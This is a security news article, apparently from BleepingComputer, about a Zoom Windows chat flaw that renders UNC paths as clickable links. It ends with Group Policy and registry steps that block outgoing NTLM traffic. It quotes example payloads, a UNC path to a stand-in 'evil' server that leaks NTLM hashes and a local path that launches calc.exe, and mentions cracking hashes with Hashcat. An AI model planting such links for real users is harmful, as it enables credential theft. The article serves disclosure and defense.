The Zoom Windows client is vulnerable to UNC path injection in the client’s chat feature that could allow attackers to steal the Windows credentials of users who click on the link.
When using the Zoom client, meeting participants can communicate with each other by sending text messages through a chat interface.
When sending a chat message, any URLs that are sent are converted into hyperlinks so that other members can click on them to open a web page in their default browser.
The problem is that security researcher @_g0dmode discovered that the Zoom client will convert Windows networking UNC paths into a clickable link in the chat messages as well.
As you can see from the chat messages above, a regular URL and the UNC path of
\\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.
You may be wondering what is so bad about that?
If a user clicks on a UNC path link, Windows will attempt to connect to the remote site using the SMB file-sharing protocol to open the remote cat.jpg file.
When doing this, by default Windows will send the user’s login name and their NTLM password hash, which can be cracked using free tools like Hashcat to dehash, or reveal, the user’s password.
Security research Matthew Hickey (@HackerFantastic), tested the UNC injection in Zoom and as you can see below was able to capture the NTLM password hashes being sent to a server hosting the clicked on share. BleepingComputer was also able to verify the same results in a local test.
What makes this particularly problematic is that with the current power of our graphics cards and CPUs, a program like Hashcat can dehash passwords quickly. For example, the below hash for a fairly easy password was dehashed in just 16 seconds.
In addition to the stealing of Windows credentials, Hickey told BleepingComputer that the UNC injects can also be used to launch programs on a local computer when a link is clicked.
For example, clicking on a UNC path like
\\127.0.0.1\C$\windows\system32\calc.exe will attempt to launch the Windows Calculator executable on the computer. Thankfully, Windows will prompt the user to allow the program to run before the program is executed.
To ultimately fix this issue, Zoom needs to prevent the chat system from converting UNC paths into clickable hyperlinks.
“Zoom should not render UNC paths as hyperlinks is the fix, I have notified Zoom as I disclosed it on Twitter,” Hickey told BleepingComputer.
BleepingComputer has contacted Zoom about this vulnerability but has not heard back at this time.
Preventing NTLM credentials from being sent to remote servers
For those who do not want to wait for a fix, there is a Group Policy that can be enabled that prevents your NTML credentials from automatically being sent to a remote server when clicking on a UNC link.
This policy is called ‘Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers’ and is found under the following path in the Group Policy Editor.
Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers
If this policy is configured to Deny All, Windows will no longer automatically send your NTLM credentials to a remote server when accessing a share.
It should be noted that when this policy is configured on domain-joined machines, it could cause issues when attempting to access shares. You can view this article to learn more about adding exceptions to the above policy.
If you are a Windows 10 Home user, you will not have access to the Group Policy Editor and will have to use the Windows Registry to configure this policy.
This can be done by creating the RestrictSendingNTLMTraffic Registry value under the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 key and setting it to 2.
Windows Registry Editor Version 5.00
To properly create this value, Windows users will need to launch the Registry Editor as an Administrator. When the above Registry settings are properly configured, the RestrictSendingNTLMTraffic value will look like the following image.
When configuring this policy, it is not necessary to reboot your computer.
To revert to the default Windows behavior of sending your NTLM credentials, you can just disable the policy by deleting the RestrictSendingNTLMTraffic value.